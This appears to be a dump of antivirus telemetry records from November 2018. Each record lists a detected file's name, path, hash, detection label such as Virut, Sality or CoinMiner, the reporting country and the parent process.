  Row(detection=Row(filename='shram_3d_scar_3d_djed_veyntrob_2007_triller_ujasy_dvdrip.exe', filepath='C:\\Users\\X\\Downloads\\shram_3d_scar_3d_djed_veyntrob_2007_triller_ujasy_dvdrip.exe', filesize=640000, name='HEUR/AGEN.1026923.#M1.#R1'), hash='05ad332369e650c75a819985cdb687fa151e30a7c1487581a6e5988bc674562b', metadata=Row(cmdline=None, country='RU', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2872320, timestamp='2018-11-01T18:40:46Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='pdf2word.exe', filepath='\\\\?\\C:\\Program Files (x86)\\FM Software Studio\\Free PDF To Word Converter\\PDF2Word.exe', filesize=1024000, name='W32/Infector.Gen8.#M300.#R700734'), hash='36734b21b88ed67e118d537af9c9f6b1df8a30af7ffc23dd33a15a66437af994', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T01:28:05Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-155010-86d1b532', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_7d835568\\AVSCAN-20181101-154414-4AD76DC3\\AVSCAN-20181101-155010-86D1B532', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T08:50:11Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='pertolongan pertama.pif', filepath='D:\\DATA_SHARE\\dini\\D_Dini\\2015\\sharing\\DINI\\LPA\\MATERI TRAINING\\MATERI PERTOLONGAN PERTAMA\\PERTOLONGAN PERTAMA.pif', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T07:25:48Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='lpa apar.exe', filepath='D:\\DATA_SHARE\\dini\\D_Dini\\2015\\sharing\\DINI\\LPA\\PROPOSAL LPA\\LPA APAR\\LPA APAR.exe', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T07:25:58Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-160034-effc2ae2', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_7d835568\\AVSCAN-20181101-154414-4AD76DC3\\AVSCAN-20181101-160034-EFFC2AE2', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T09:00:35Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avirasecuritycenteragent.exe', filepath='c:\\program files (x86)\\avira\\antivirus\\avirasecuritycenteragent.exe', filesize=840000, name='W32/Sality.Patched.#M1.#R1'), hash='4d3390f1bd3f6b3986e670c2eabfea2e528541ac16d0a33f07254858aaf4e781', metadata=Row(cmdline='\\/LOGFILE=\\"C:\\\\ProgramData\\\\Avira\\\\Antivirus\\\\LOGFILES\\\\AviraSecurityCenterAgent-2018-11-01-00-47-50.log\\" \\/LOGLEVEL=\\"STANDARD\\" \\/UPDATE_WSC=\\"ENABLE\\" \\/VDFDATE=\\"2018-10-26T00:00:00\\" \\/TRIGGER=\\"gpschd.dll Cyclic Check\\"', country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Avira\\Antivirus\\sched.exe', parentsize=248312, timestamp='2018-11-01T04:37:12Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='0429b5ba85637e118eb544eeffbdb38f5a79217ad2391fdf02e8d677ab26aa53', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-35\\0429B5BA85637E118EB544EEFFBDB38F5A79217AD2391FDF02E8D677AB26AA53', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='0429b5ba85637e118eb544eeffbdb38f5a79217ad2391fdf02e8d677ab26aa53', metadata=Row(cmdline=None, country=None, os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T16:12:39Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='transcodedwallpaper', filepath='C:\\Users\\X\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\TranscodedWallpaper', filesize=3456000, name='EXP/MS04-028.JPEG.A.#M1.#R1'), hash='4b525aaa4ae479f3c4bdabc51ca3b966be9d881f74cc7f3e840b73e413ccef6d', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\explorer.exe', parentsize=3611368, timestamp='2018-11-01T07:46:22Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='gf.2013.exe', filepath='D:\\DATA_SHARE\\dini\\D_Dini\\2015\\New Folder\\CINTIA\\FD\\New Folder\\fd\\GF INDONESIA\\LAP.BULANAN\\GF.2013\\GF.2013.exe', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T07:24:36Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='soundbox.dll', filepath='C:\\Users\\X\\Music\\soundbox.dll', filesize=64000, name='TR/Agent.akywp.#M1.#R1'), hash='0b780bea8bb24a4855fcdc22534d86bac0ced9967ed4a6066bbb58ba833c89d1', metadata=Row(cmdline='\\\\\\"C:\\\\\\\\Users\\\\\\\\X\\\\\\\\Music\\\\\\\\1.vbs\\\\\\" ', country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\wscript.exe', parentsize=141824, timestamp='2018-11-01T12:00:15Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='pdf2word.exe', filepath='C:\\Program Files (x86)\\FM Software Studio\\Free PDF To Word Converter\\PDF2Word.exe', filesize=1024000, name='W32/Infector.Gen8.#M300.#R700734'), hash='36734b21b88ed67e118d537af9c9f6b1df8a30af7ffc23dd33a15a66437af994', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=3229696, timestamp='2018-11-01T03:19:57Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='kh dau tranh ca.exe', filepath='H:\\\xa0\\Chuyen an ĐB718\\KH Dau tranh CA.exe', filesize=1664000, name='TR/ATRAPS.Gen4.#M300.#R300784'), hash='25082dc46ff2ad9c2ce9b262ffbafd1b92f201df475cf0e6e88ed9e7df7a2607', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2872320, timestamp='2018-11-01T08:30:02Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='documentos diversos .scr', filepath='C:\\Users\\X\\Desktop\\Documentos diversos .scr', filesize=320000, name='WORM/Nenebra.A.#M1.#R1'), hash='53a514f013d76540f5daf64de34a640b8a214a9af019a5c257fd562ca7d50ee5', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe1_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe1 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='BR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=164352, timestamp='2018-11-01T16:46:36Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='maintenancesservices.dll', filepath='C:\\Windows\\System32\\MaintenancesServices.dll', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T05:03:31Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-123928-0d061469', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181101-123906-FA1AA8E2\\AVSCAN-20181101-123928-0D061469', filesize=20000, name='PUA/Linkury.Gen2.#M300.#R101296'), hash='9d728e799087184abed77f070f3fdee4fd9fae622bf93bcfa4744be9dfaf89e9', metadata=Row(cmdline=None, country='ES', os_name='Windows', os_vmajor='6', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T11:39:28Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='mstjy.exe', filepath='C:\\ProgramData\\mstjy.exe', filesize=70112000, name='WORM/Lodbak.Gen.#M2.#R7829'), hash='5c54ab809c85d95bace97bc56b16f59c2e0aa0b14db212e7a264d6299aeb0149', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T06:27:49Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='wuauserv.exe', filepath='C:\\Windows\\SysWOW64\\drivers\\UMDF\\tr-KL\\wuauserv.exe', filesize=448000, name='W32/Hlubea.Z.#M1.#R1'), hash='927986f56707e3dfe2adca5e4224417a764405e155f4ac1e60ddf7b6085c8c2c', metadata=Row(cmdline='-k LocalSystemNetworkRestricted', country='IN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\svchost.exe', parentsize=20992, timestamp='2018-11-01T19:47:39Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='wuauserv.exe', filepath='C:\\Windows\\SysWOW64\\drivers\\UMDF\\tr-KL\\wuauserv.exe', filesize=448000, name='W32/Hlubea.Z.#M1.#R1'), hash='927986f56707e3dfe2adca5e4224417a764405e155f4ac1e60ddf7b6085c8c2c', metadata=Row(cmdline='-k LocalSystemNetworkRestricted', country='IN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\svchost.exe', parentsize=20992, timestamp='2018-11-01T18:47:28Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='com.google.android.music.exe', filepath='G:\\Android\\data\\com.google.android.music.exe', filesize=1600000, name='TR/Patched.Ren.Gen4.#M300.#R300179'), hash='e9238eb4cc2a0e45a4ecca77c7477cc3a19b6954cc0ca545537f1325ece125fc', metadata=Row(cmdline=None, country='CI', os_name='Windows', os_vmajor='6', os_vminor='2', parentproc='C:\\Windows\\explorer.exe', parentsize=2106176, timestamp='2018-11-01T11:54:11Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='a0000876.exe', filepath='\\\\?\\G:\\System Volume Information\\_restore{C55BB417-5842-42AE-ADE1-F67D4C7D69A5}\\RP4\\A0000876.exe', filesize=110208000, name='W32/Virut.Gen.#M1.#R1'), hash='dcce5c12d1299ec027363e7c8ecff6773be9e4536324a2781f6447dec6b08619', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T23:12:04Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='acgpower.exe', filepath='C:\\Users\\X\\Documents\\ACGPower.exe', filesize=2240000, name='HEUR/AGEN.1028166.#M1.#R1'), hash='dc4e7790641813e83676f7e2fa896cf5b3238c6f8aac1d360bf3902f6a786894', metadata=Row(cmdline=None, country='CN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\360\\360safe\\360Safe.exe', parentsize=951928, timestamp='2018-11-01T03:18:14Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-110013-a9302311', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_6d9d8225\\AVSCAN-20181101-105540-86DD2301\\AVSCAN-20181101-110013-A9302311', filesize=704000, name='Worm/IRCBot.ms.70.#M1.#R1'), hash='ceb41711d9656413e2e7523f1b9c2cf61cd9368c110cea44bc9314cc1e7075b0', metadata=Row(cmdline=None, country='MX', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-01T16:59:58Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='crack.exe', filepath='C:\\Program Files (x86)\\The_Secret_0.1.2.2\\crack\\crack.exe', filesize=7936000, name='TR/Crypt.TPM.Gen.#M300.#R2977'), hash='77c91e39fd62c026c8a45d51bc5f65370b38bc1bffc700fae82bada75dbcfba6', metadata=Row(cmdline='\\\\\\/systemstart \\\\\\/adminuser', country='US', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\IObit\\IObit Malware Fighter\\IMF.exe', parentsize=5600528, timestamp='2018-11-01T01:43:26Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='miner.exe', filepath='\\\\?\\C:\\Users\\X\\Desktop\\zec seb1 - Copie (2)\\miner.exe', filesize=320000, name='PUA/CoinMiner.HO.#M1.#R1'), hash='84dd02debbf2b0c5ed7eebf813305543265e34ec98635139787bf8b882e7c7b4', metadata=Row(cmdline=None, country='FR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T21:41:54Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-105941-2caedae3', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181101-105645-15327038\\AVSCAN-20181101-105941-2CAEDAE3', filesize=2816000, name='TR/Crypt.CFI.Gen.#M1.#R1'), hash='d4c8083f289e16a5c13992bc54862e71bbc132c3f3a0ddc6e4c4741c531ad963', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T02:59:44Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='wrfup9xw7.exe', filepath='C:\\PROGRA~1\\WRFUP9XW7W\\WRFUP9XW7.exe', filesize=832000, name='TR/Dropper.Gen.#M300.#R4133'), hash='8b89a98a561958e87953f6daa4f96b58f73edee4630396363aa1ea09d732cf60', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\AVAST Software\\Avast\\AvastSvc.exe', parentsize=325024, timestamp='2018-11-01T20:25:03Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='cloudbackup9681.exe', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\CloudBackup9681.exe', filesize=5600000, name='PUA/MyPCBackup.Gen.#M300.#R5908'), hash='6faf0ee307903290e31e2097dae91d0439aa112ba2e53a53f9f23ef5798e1a82', metadata=Row(cmdline='\\\\\\/monitor', country='BR', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Program Files\\CCleaner\\CCleaner64.exe', parentsize=19467544, timestamp='2018-11-01T19:21:47Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='audiodg.exe', filepath='\\\\?\\C:\\Windows\\winsxs\\x86_microsoft-windows-audio-audiocore_31bf3856ad364e35_6.1.7601.23403_none_793a69235bf87c5b\\audiodg.exe', filesize=128000, name='W32/Virut.Gen.#M1.#R1'), hash='c2b9d3d31b8dbdb7d8c0487a19841ae676cbcbc075892bdfa64eddb386417d17', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T11:17:52Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='searchprotocolhost.exe', filepath='C:\\Windows\\System32\\SearchProtocolHost.exe', filesize=192000, name='W32/Virut.Gen.#M1.#R1'), hash='6fc6e123109375b69e5e8a00ad949fc53433947bfc9551f2cef91c11c9afaf68', metadata=Row(cmdline='\\\\\\/Embedding', country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchIndexer.exe', parentsize=428032, timestamp='2018-11-01T09:53:46Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='หนู มิเตอร์ ,หลวงไก่,บ่าววี,วิด ไฮเปอร์ - จตุรทุ่ง.exe', filepath='E:\\music\\music\\ลูกทุ่ง โดนจาย\\หนู มิเตอร์ ,หลวงไก่,บ่าววี,วิด ไฮเปอร์ - จตุรทุ่ง\\หนู มิเตอร์ ,หลวงไก่,บ่าววี,วิด ไฮเปอร์ - จตุรทุ่ง.exe', filesize=1088000, name='W32/Virut.Gen.#M1.#R1'), hash='8555a0cd5f00b2189166e8c83976697567a1d36abf3016151210acd646f5d0da', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe1_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe1 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='TH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=164352, timestamp='2018-11-01T09:14:09Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='xtpkgtgmbiq.dll', filepath='\\\\?\\C:\\Users\\X\\AppData\\Local\\Temp\\nssB325.tmp\\xTPKGtGMbiQ.dll', filesize=1152000, name='Adware/Zdengo.fru.#M1.#R1'), hash='ea813cd4129df283f7ae7bc890fd650fc1d876e20be0e460aba3eac62a93efc0', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T17:01:37Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-110610-d64f91cf', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_6d9d8225\\AVSCAN-20181101-105540-86DD2301\\AVSCAN-20181101-110610-D64F91CF', filesize=704000, name='Worm/IRCBot.ms.70.#M1.#R1'), hash='ceb41711d9656413e2e7523f1b9c2cf61cd9368c110cea44bc9314cc1e7075b0', metadata=Row(cmdline=None, country='MX', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-01T17:05:56Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='digitalrescue4premium.exe', filepath='K:\\HBCD\\Programs\\DIGITALRESCUE4PREMIUM.EXE', filesize=64000, name='BDS/Rogue.766077.#M1.#R1'), hash='be37e8db54be4ab3f6336804357cd17c9b97e65cdb98cb4242bf352aa9ca0f8d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\WINDOWS\\explorer.exe', parentsize=3933184, timestamp='2018-11-01T17:00:03Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='updater_zip_res0301_newmm[6].exe', filepath='\\\\?\\C:\\Windows\\System32\\config\\systemprofile\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Content.IE5\\Updater_zip_res0301_newmm[6].exe', filesize=10368000, name='ADWARE/ELEX.Gen.#M300.#R7708'), hash='f062a67cda8a7166a774b121aaaed4283fc49b671084b55745a7262df0b7b65e', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T09:25:43Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='reader.pif', filepath='C:\\Users\\X\\Foxit Software\\Foxit Reader\\Reader.pif', filesize=512000, name='TR/Taranis.2886.#M1.#R1'), hash='5d7619a3ea0a69ca84d26878d6cc2d60a93f9b95f23d937c064d5ba9043b9405', metadata=Row(cmdline=None, country='TR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T08:57:27Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-162936-11b14ad4', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_0219e0d6\\AVSCAN-20181101-160503-1618A0E9\\AVSCAN-20181101-162936-11B14AD4', filesize=840000, name='TR/Miner.OA.#M1.#R1'), hash='0978fcc7db3a27e180fca68b33d99c6bbe8173054f1cd0ebfd0fe0be35667656', metadata=Row(cmdline=None, country='GE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T12:29:36Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-163336-9e88b5a3', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_db3835ad\\AVSCAN-20181101-163308-9AA83104\\AVSCAN-20181101-163336-9E88B5A3', filesize=1152000, name='HEUR/APC.#M1.#R1'), hash='3606a529040d3201d305e1624f739663c2341bb5e04965ee9c8636bf67a55c93', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-01T15:33:37Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='scvhost.exe', filepath='\\\\?\\C:\\Users\\X\\AppData\\Roaming\\Update\\scvhost.exe', filesize=448000, name='APPL/BitCoinMiner.5.12.#M1.#R1'), hash='06c5e86be6dca55eda888cd820a30394eba9b9b69d2887f3d652a139ae00c371', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T08:37:46Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='setacl.exe', filepath='C:\\Program Files\\ATI\\CIM\\Bin\\SetACL.exe', filesize=400000, name='W32/Sality.AW.#M1.#R1'), hash='6d0998f35370149f0c3503e8ab27ab6679e5ec07bc5eda315c929aaba9c56ae8', metadata=Row(cmdline='aepdu.dll,AePduRunUpdate', country='MX', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\rundll32.exe', parentsize=44544, timestamp='2018-11-01T13:15:25Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-202516-b378084c', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_67007e69\\AVSCAN-20181101-094155-81A578CA\\AVSCAN-20181101-202516-B378084C', filesize=6848000, name='TR/Surveyer.6848000.#M1.#R1'), hash='82476d0e2c4ba1edf6d31c2539624fd63a6ddf6e7c880a385344cd6240dbb272', metadata=Row(cmdline=None, country='PL', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T19:25:19Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='steam_api_c.dll', filepath='C:\\chon\\steam_api_c.dll', filesize=128000, name='W32/Ramnit.CD.#M1.#R1'), hash='7cea36e5dfa494f024986632c183f2498cca22254c8de274076a89f13bb305ec', metadata=Row(cmdline=None, country='PE', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T22:02:20Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='1_8_5_5.html', filepath='\\\\?\\C:\\Users\\X\\AppData\\Local\\VirtualStore\\Program Files\\Adobe\\Audition 1.5\\help\\ja_JP\\html\\1_8_5_5.html', filesize=1620000, name='W32/Chir.B.#M1.#R1'), hash='564db0c9450b80923355494e3c95d2a39861bf92e9ba41843186ffe22b04ade8', metadata=Row(cmdline=None, country='IQ', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T15:20:11Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='audiodg.exe', filepath='C:\\Windows\\System32\\audiodg.exe', filesize=128000, name='W32/Virut.Gen.#M1.#R1'), hash='150c1ae293ee6c85c21683021670a64ec4944ff46f37c517373a82a958676835', metadata=Row(cmdline='-k LocalServiceNetworkRestricted', country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\svchost.exe', parentsize=21504, timestamp='2018-11-01T09:56:13Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='unblockpin.exe', filepath='C:\\Program Files\\D-com 3G\\UnblockPin.exe', filesize=41472000, name='W32/Sality.AT.#M1.#R1'), hash='14e3bc696c7c4e79bc4cd2bf41f9ab2e0e4c3cd9747c603b5ec045ecd9a6bfba', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\Microsoft Office\\Office12\\GrooveMonitor.exe', parentsize=100648, timestamp='2018-11-01T14:56:58Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='tmp000007ab', filepath='C:\\Windows\\Temp\\tmp00000159\\tmp000007ab', filesize=8932000, name='PUA/WinThruster.EL.1.#M1.#R1'), hash='64b46a0d05b19c1c86d8ac8257e356780ad7a327b9fc9ebd3c5db5631efc69dd', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files\\ITbrain\\AntiMalware\\ITbrain_AntiMalware_Service.exe', parentsize=5719344, timestamp='2018-11-01T11:38:09Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='beadaebecebfdbdaebeaebdbecfcbdaeafbfdadbadcececaeacbdafdfdaeb.beadaebecebfdbdaebeaebdbecfcbdaeafbfdadbadcececaeacbdafdfdaeb', filepath='\\\\?\\I:\\\xa0\\beadaebecebfdbdaebeaebdbecfcbdaeafbfdadbadcececaeacbdafdfdaeb.beadaebecebfdbdaebeaebdbecfcbdaeafbfdadbadcececaeacbdafdfdaeb', filesize=7488000, name='TR/Crypt.ZPACK.Gen7.#M300.#R604114'), hash='53321f65d45fcf9b30a9f3a98e5d89051fdaba3bad5d7c88e43bde9e5b6a300e', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T02:58:45Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181102-002528-4be021b3', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_8b7397db\\AVSCAN-20181102-001743-196A0AE8\\AVSCAN-20181102-002528-4BE021B3', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='578d39ad2094181562e84cc0f0ef7a99aef1f27a5e537651d45dee406006b474', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T17:25:35Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-01T05:30:21Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='ad-aware-522-downloader.exe', filepath='C:\\Users\\X\\Desktop\\Medion\\Datensicherung Medion\\MKnetzger\\Downloads\\ad-aware-522-Downloader.exe', filesize=512000, name='PUA/DownloadSponsor.Gen.#M300.#R5738'), hash='7cfbe228740d995a5a99972e9e7fc5849f8de1bbdea59dfcab61d15ec902eee3', metadata=Row(cmdline='-m:appraiser.dll -f:DoScheduledTelemetryRun -cv:Y9tHYuwhR0uiy3CV.1', country='DE', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\System32\\CompatTelRunner.exe', parentsize=None, timestamp='2018-11-01T10:17:44Z'), dt=datetime.date(2018, 11, 1)),
